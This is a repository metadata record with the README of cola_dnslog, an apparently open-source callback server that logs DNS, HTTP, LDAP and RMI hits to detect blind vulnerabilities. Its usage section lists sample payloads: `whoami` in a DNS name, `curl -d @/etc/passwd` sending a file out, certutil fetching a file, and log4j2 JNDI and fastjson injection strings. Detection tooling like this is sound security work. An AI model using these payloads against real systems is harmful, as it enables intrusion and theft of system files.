{"id":13846183,"url":"https://github.com/AbelChe/cola_dnslog","last_synced_at":"2025-07-12T05:32:14.446Z","repository":{"id":50717126,"uuid":"519473887","full_name":"AbelChe/cola_dnslog","owner":"AbelChe","description":"Cola Dnslog v1.3.2: a more powerful dnslog platform / helper platform for detecting blind (no-echo) vulnerabilities. Fully open source. dnslog httplog ldaplog rmilog. Supports the dns, http, ldap and rmi protocols. Provides an API for easy integration with other tools. Supports notifications via DingTalk robot, Bark, etc. Supports one-command docker deployment. The backend is implemented entirely in python; the frontend is built on vue-element-admin.","archived":false,"fork":false,"pushed_at":"2023-02-06T04:48:57.000Z","size":20957,"stargazers_count":426,"open_issues_count":4,"forks_count":60,"subscribers_count":9,"default_branch":"main","last_synced_at":"2024-08-05T17:46:06.873Z","etag":null,"topics":["bark","dingtalk-robot","dnslog","dnslog-python","element","fastjson","http","httplog","ldap","ldaplog","log4j2","python","rmi","rmilog","ruoyi","vue"],"latest_commit_sha":null,"homepage":"https://abelche.github.io/cola_dnslog/","language":"Vue","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"apache-2.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/AbelChe.png","metadata":{"files":{"readme":"Readme.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null}},"created_at":"2022-07-30T09:30:31.000Z","updated_at":"2024-07-14T13:45:25.000Z","dependencies_parsed_at":"2023-02-18T16:31:38.523Z","dependency_job_id":null,"html_url":"https://github.com/AbelChe/cola_dnslog","commit_stats":null,"previous_names":[],"tags_count":1,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AbelChe%2Fcola_dnslog","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AbelChe%2Fcola_dnslog/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/
AbelChe%2Fcola_dnslog/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/AbelChe%2Fcola_dnslog/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/AbelChe","download_url":"https://codeload.github.com/AbelChe/cola_dnslog/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":225799472,"owners_count":17526052,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["bark","dingtalk-robot","dnslog","dnslog-python","element","fastjson","http","httplog","ldap","ldaplog","log4j2","python","rmi","rmilog","ruoyi","vue"],"created_at":"2024-08-04T17:04:34.809Z","updated_at":"2024-11-21T20:30:18.059Z","avatar_url":"https://github.com/AbelChe.png","language":"Vue","funding_links":[],"categories":["Vue"],"sub_categories":[],"readme":"\u003cdiv align=\"center\"\u003e\n\u003cimg src=\"readme_resource/sugarless.png\" alt=\"sugarless\" width=\"30%\" /\u003e\n\u003cimg src=\"readme_resource/dnslog.png\" alt=\"dnslog\" width=\"30%\" /\u003e\n\u003c/div\u003e\nAn English version is on the way......\n\n# Cola Dnslog\n\n\u003cdiv align=\"right\"\u003e\n\u003cp\u003e--AbelChe\u003c/p\u003e\n\u003c/div\u003e\nCola Dnslog is a more powerful dnslog platform (a helper platform for detecting blind, no-echo vulnerabilities):\n\n- Fully open source\n- Supports the dns, http, ldap and rmi protocols\n- Provides an API for easy integration with other tools\n- Supports notifications via DingTalk robot, Bark, etc.\n- Supports one-command docker deployment\n\n\n------\n\nTechnologies and frameworks involved:\n\n`dns` `http` `ldap` `rmi` `webui` `vue-element-admin` `fastapi` `sqlite`\n\nVulnerabilities it can help detect:\n\n`log4j2` `fastjson` `ruoyi` `Spring` `RCE` `Blind SQL` `Blind XXE`\n\nFeatures:\n\n`Dingtalk Robot` `Bark` `API` `ldaplog` `rmilog` `Docker`\n\n[![Stargazers over 
time](https://starchart.cc/AbelChe/cola_dnslog.svg)](https://starchart.cc/AbelChe/cola_dnslog)\n\n## 🥯 Usage\n\n\u003e Assume the domain you purchased is `example.com`\n\u003e\n\u003e and your vps ip is `1.1.1.1`\n\n### Domain\n\nPurchase a domain yourself and delegate its name servers to the server where cola_dnslog is deployed.\n\nUsing godaddy as an example:\n\n1. On the domain DNS configuration page, open the three-dot menu in the upper right corner and click Host Names\n\n![image-20220717175903352](readme_resource/image-20220717175903352.png)\n\n2. Edit or add host names as shown below, entering your vps address as the ip address\n\n![image-20220717180002176](readme_resource/image-20220717180002176.png)\n\n3. Go back to dns management and change the name servers to `ns1.example.com` and `ns2.example.com`\n\n![image-20220717180242944](readme_resource/image-20220717180242944.png)\n\n### Installation and deployment\n\n\u003e For well-known reasons concerning networks in mainland China, most users on a domestic VPS get stuck at the frontend npm build step. No better solution has been found so far; a VPS outside China, or one with unrestricted network access, is recommended.\n\u003e\n\u003e Issues are welcome!\n\n#### Docker (recommended)\n\n##### One-command start (recommended)\n\n1. Download the source code\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\ncd cola_dnslog\n```\n\n2. Edit the environment variables in docker-compose.yml\n\n```yml\n...\n  server:\n    ...\n    environment:\n      DNS_DOMAIN: example.com # your own domain\n      NS1_DOMAIN: ns1.example.com # ns1 binding\n      NS2_DOMAIN: ns2.example.com # ns2 binding\n      SERVER_IP: 1.1.1.1 # vps ip\n      HTTP_PORT: 80 # httplog service port\n      HTTP_RESPONSE_SERVER_VERSION: nginx # server info in the httplog response header, Server: nginx\n      LDAP_PORT: 1389 # ldaplog service port\n      RMI_PORT: 1099 # rmilog service port\n    ...\n  front:\n    ...\n    environment:\n      API_BASE_URL: 'http://1.1.1.1:28001' # http://vpsip:28001 / http://example.com:28001\n    ...\n\n```\n\n3. Start\n\n```sh\ndocker-compose up -d\n```\n\n4. 
After startup, check the docker logs or read info.txt to get the account information\n\n\u003e When the server program runs, it creates an info.txt in the program root directory that records the initialized account information\n\n```sh\ndocker-compose logs\ndocker exec -it \u003ccontainer_id\u003e cat /coladnslog/info.txt\n```\n\n![image-20220812005813825](readme_resource/image-20220812005813825.png)\n\n\u003e To use custom ports, change the `ports` mapping in `docker-compose.yml`\n\n\n\n##### Separate frontend and backend deployment\n\nServer:\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\ncd cola_dnslog\n\ndocker build -t coladnslog_server -f Dockerfile_server .\ndocker run -itd \\\n-e DNS_DOMAIN=example.com \\\n-e NS1_DOMAIN=ns1.example.com \\\n-e NS2_DOMAIN=ns2.example.com \\\n-e SERVER_IP=1.1.1.1 \\\n-e HTTP_PORT=80 \\\n-e HTTP_RESPONSE_SERVER_VERSION=nginx \\\n-e LDAP_PORT=1389 \\\n-e RMI_PORT=1099 \\\n--net=host \\\n--name ColaDnslog_server coladnslog_server\n```\n\nClient:\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\ncd cola_dnslog\n\nsudo docker build --build-arg VERSION=v1.3.2 -t coladnslog_front -f Dockerfile_front .\nsudo docker run -itd \\\n-p 18080:80 \\\n-e \"API_BASE_URL=http://1.2.3.4:28001\" \\\n--name ColaDnslog_front coladnslog_front\n```\n\n\n\n#### Installing from source\n\nThere are four steps in total.\n\n##### **Step 1: Download the source code**\n\nDownload the source code\n\n```sh\ngit clone https://github.com/Abelche/cola_dnslog.git\n```\n\n\u003e I usually run the services in the background with `tmux`\n\n##### **Step 2: Start the webserver**\n\nInstall the python (python\u003e=3.7) dependencies\n\nNote that python 3.7 or later is required, otherwise there will be compatibility problems; conda is recommended when multiple python versions are installed\n\n```sh\ncd cola_dnslog\npip install -r requirements.txt\n```\n\nEdit `config.yaml` in the root directory\n\nThe main values to change are `DNS_DOMAIN` `NS1_DOMAIN` `NS2_DOMAIN` `SERVER_IP`\n\nOptional: change `HTTP_RESPONSE_SERVER_VERSION` to spoof the Server field in http responses\n\n```yaml\nglobal:\n  DB_FILENAME: sqlite.db\n\nlogserver:\n  DNS_DOMAIN: example.com\n  NS1_DOMAIN: ns1.example.com\n  NS2_DOMAIN: ns2.example.com\n  SERVER_IP: 1.1.1.1\n  DNS_PORT: 53\n  HTTP_HOST: 0.0.0.0\n  HTTP_PORT: 80\n  HTTP_RESPONSE_SERVER_VERSION: nginx\n  LDAP_HOST: 0.0.0.0\n  LDAP_PORT: 1389\n  RMI_HOST: 0.0.0.0\n  RMI_PORT: 1099\n\nwebserver:\n  HOST: 0.0.0.0\n  PORT: 28001\n  PASSWORD_SALT: 
any long random string, e.g. cuau89j2iifdas8\n```\n\nStart the webserver and the logserver. Note that the webserver must be started first, because the database is initialized through the webserver; after initialization, the account, password, token, logid and other information are printed to the terminal.\n\n```sh\nchmod +x start_webserver\n./start_webserver\n```\n\n![image-20220730035846090](readme_resource/image-20220730035846090.png)\n\n\n\n##### **Step 3: Start the logserver** (requires root privileges)\n\n```sh\nchmod +x start_logserver\nsudo ./start_logserver\n```\n\n![image-20220730160132103](readme_resource/image-20220730160132103.png)\n\n\n\n##### **Step 4: Start the frontend**\n\nNow for the frontend (it does not have to be deployed together with the webserver; you can even package it as a local client with electron). First edit the configuration file `.env.production`\n\n```sh\ncd src/front\nvim .env.production\n```\n\n```ini\n# just a flag\nENV = 'production'\n\n# base api\nVUE_APP_BASE_API = 'http://1.1.1.1:28001'\n\nTARGET_API = 'http://1.1.1.1:28001'\n```\n\nThen install the dependencies with npm, build, and start an http service (any http server will do; for convenience I start one directly with python)\n\n```sh\ncd src/front\nnpm install\nnpm run build:prod\n\ncd dist\npython3 -m http.server 18001\n```\n\nAt this point all three components (webserver, logserver, and webui frontend) are running!\n\nVisiting http://1.1.1.1:18001 should now show the login page!\n\nHave fun!\n\n### DingTalk Robot\n\nCreate a new robot in a DingTalk group. Security settings: add the custom keyword `coladnslog`\n\n![image-20220731231424000](readme_resource/image-20220731231424000.png)\n\nThen obtain the webhook token. Note that only the token needs to be filled in\n\n![image-20220731231912885](readme_resource/image-20220731231912885.png)\n\nOpen the webui, set Dingtalk Robot Token to the token obtained above, and click Update to save\n\n![image-20220802020311279](readme_resource/image-20220802020311279.png)\n\nThe result looks like this:\n\n\u003cimg src=\"readme_resource/image-20220731231301577.png\" alt=\"image-20220731231301577\" style=\"zoom:33%;\" /\u003e\n\n### Bark\n\n[Finb/Bark: Bark is an iOS App which allows you to push custom notifications to your iPhone (github.com)](https://github.com/Finb/Bark)\n\n[Finb/bark-server: Backend of Bark (github.com)](https://github.com/Finb/bark-server)\n\nAs above: open the webui, turn on the Bark switch, set the bark url, and click Update to save\n\n![image-20220802015907678](readme_resource/image-20220802015907678.png)\n\nThe result looks like this:\n\n\u003cimg src=\"readme_resource/image-20220802015642879.png\" alt=\"image-20220802015642879\" style=\"zoom: 
25%;\" /\u003e\n\n### How to use\n\nAs mentioned above, assume the domain and ip are `example.com` and `1.1.1.1`, and the logid of our account is `qrq`\n\n#### DNS\n\n```sh\nnslookup `whoami`.qrq.example.com\nping `whoami`.qrq.example.com\n```\n\n#### HTTP\n\n```sh\ncurl 1.1.1.1/qrq/some/info\ncurl -d @/etc/passwd 1.1.1.1/qrq/postdata\ncertutil -urlcache -split -f http://1.1.1.1/x x\n```\n\n#### LDAP\n\nThis method can be used for log4j2, fastjson, etc.\n\nNote that the logid must be the final part of the path, e.g. `ldapqrq` `xxxxqrq` `qrq` `xxx/qrq`\n\n```\n${jndi:ldap://1.1.1.1:1389/ldapqrq}\n{\"@type\":\"LLcom.sun.rowset.JdbcRowSetImpl;;\",\"dataSourceName\":\"ldap://1.1.1.1:1389/ldapqrq\", \"autoCommit\":true}\n```\n\n#### RMI\n\nAs above, for log4j2, fastjson, etc.\n\n```\n${jndi:rmi://1.1.1.1:1099/rmiqrq}\n{ \"b\":{ \"@type\":\"com.sun.rowset.JdbcRowSetImpl\", \"dataSourceName\":\"rmi://1.1.1.1:1099/rmiqrq\", \"autoCommit\":true } }\n```\n\n## 👀 Overview\n\n### Login\n\n![image-20220730151326711](readme_resource/image-20220730151326711.png)\n\n\n\n### Home\n\n![image-20220731143149729](readme_resource/image-20220731143149729.png)\n\n\n\n### Dnslog\n\n![image-20230204200108337](readme_resource/image-20230204200108337.png)\n\n\n\n### Httplog\n\n![image-20230204200455783](readme_resource/image-20230204200455783.png)\n\n\n\n### Ldaplog\n\n![image-20230204201704004](readme_resource/image-20230204201704004.png)\n\n\n\n### Rmilog\n\n![image-20230204201750497](readme_resource/image-20230204201750497.png)\n\n\n\n### Account information\n\n![image-20220801003540673](readme_resource/image-20220801003540673.png)\n\n\n\n### DingTalk Robot\n\n\u003cimg src=\"readme_resource/image-20220731231301577.png\" alt=\"image-20220731231301577\" style=\"zoom: 25%;\" /\u003e\n\n\n\n### Bark\n\n\u003cimg src=\"readme_resource/image-20220802015642879.png\" alt=\"image-20220802015642879\" style=\"zoom: 25%;\" /\u003e\n\n## 📔 Changelog\n\n- 2023-02-03 v1.3.2\n  1. Changed the default resolution records: A-record queries for domain[.]com and *[.]domain[.]com now point to 127.0.0.1; added `md5(serverip)`[.]admin[.]domain[.]com as the entry point for access by domain name\n  2. 
Fixed: logserver crashed with `Segmentation fault` [issues19](https://github.com/AbelChe/cola_dnslog/issues/19)\n  3. Changed the default docker deployment of the frontend (no user-side build required)\n  4. Added a clear-logs feature\n- 2022-08-12 v1.3.1\n  1. Fixed the dns port conflict in the docker deployment\n- 2022-08-12 v1.3.0\n  1. Created the api documentation https://abelche.github.io/cola_dnslog/\n  2. Updated the docker deployment method\n  3. Fixed some display issues\n- 2022-08-09 v1.2.2 v1.2.3\n  1. Updated the readme\n  2. Fixed a filename typo\n- 2022-08-03 v1.2.1\n  1. Updated the readme\n- 2022-08-02 v1.2.0\n  1. Added bark notifications\n  2. Changed the logserver http response to a 1x1 gif image\n  3. Added spoofing of the `Server` field in http responses\n  4. Fixed the switch bug on the frontend profile page\n- 2022-08-01 v1.1.0\n  1. Added token regeneration and password change\n  2. Improved the frontend display and rendering speed\n  3. Added sorting by id\n  4. The Usage section on the home page is now generated automatically from the server\n  5. Added the DingTalk robot\n  6. Fixed an rmi protocol parsing bug\n- 2022-07-30 v1.0.0\n  1. Released cola_dnslog v1.0.0\n\n## 🎯 ==TODO==\n\n- [x] DingTalk integration [2022-07-31]\n- [x] bark integration [2022-08-02]\n- [x] Add api documentation [2022-08-12]\n- [ ] Add IP geolocation\n- [x] One-command docker deployment [2022-08-12]\n- [ ] Other protocols\n- [ ] Add support for mysql and other databases\n\n## 📜 Notice\n\nThis project is licensed under the Apache License 2.0\n\n\n## 🌟 404 StarLink Project\n![](https://github.com/knownsec/404StarLink-Project/raw/master/logo.png)\n\nCola Dnslog has joined the [404 StarLink Project](https://github.com/knownsec/404StarLink)\n\n## 💦 Other\n\n### 🎖 They contributed too!\n\n\u003ctable\u003e\n  \u003ctr\u003e\n    \u003ctd align=\"center\"\u003e\u003ca href=\"https://github.com/Weik1\"\u003e\u003cimg src=\"https://avatars.githubusercontent.com/u/34065927?v=4\" width=\"100px;\" alt=\"\"/\u003e\u003cbr /\u003e\u003csub\u003e\u003cb\u003eWeik1\n\u003c/b\u003e\u003c/sub\u003e\u003c/a\u003e\u003cbr /\u003e🐡\u003c/td\u003e\n  \u003c/tr\u003e\n\u003c/table\u003e\n\n### 🎉 References\n\n- https://panjiachen.github.io/vue-element-admin-site/zh/\n- [https://github.com/NickstaDB/SerializationDumper](https://github.com/NickstaDB/SerializationDumper)\n- https://docs.oracle.com/javase/7/docs/technotes/guides/rmi/faq.html#netcontact\n- http://www.hackdig.com/02/hack-596460.htm\n- Too many to list one by one......................\n\n### ☕️ buy me a coffee 3q\n\nYou are welcome to add me on WeChat to exchange ideas and improve together `RG9nZ3lDaGVuZwo=`\n\n| Buy him a coffee so he keeps coding! | You can also join the Zhishi Xingqiu (Knowledge Planet) group to chat (free) |\n| -------------------------- | 
-------------------------- |\n\n\u003cdiv align=\"center\"\u003e\n\u003cimg src=\"readme_resource/wx.jpg\" alt=\"IMG_4788\" width=\"40%\" /\u003e\n\u003cimg src=\"readme_resource/xq.jpg\" alt=\"xq.jpg\" width=\"45%\" /\u003e\n\u003c/div\u003e","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAbelChe%2Fcola_dnslog","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FAbelChe%2Fcola_dnslog","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FAbelChe%2Fcola_dnslog/lists"}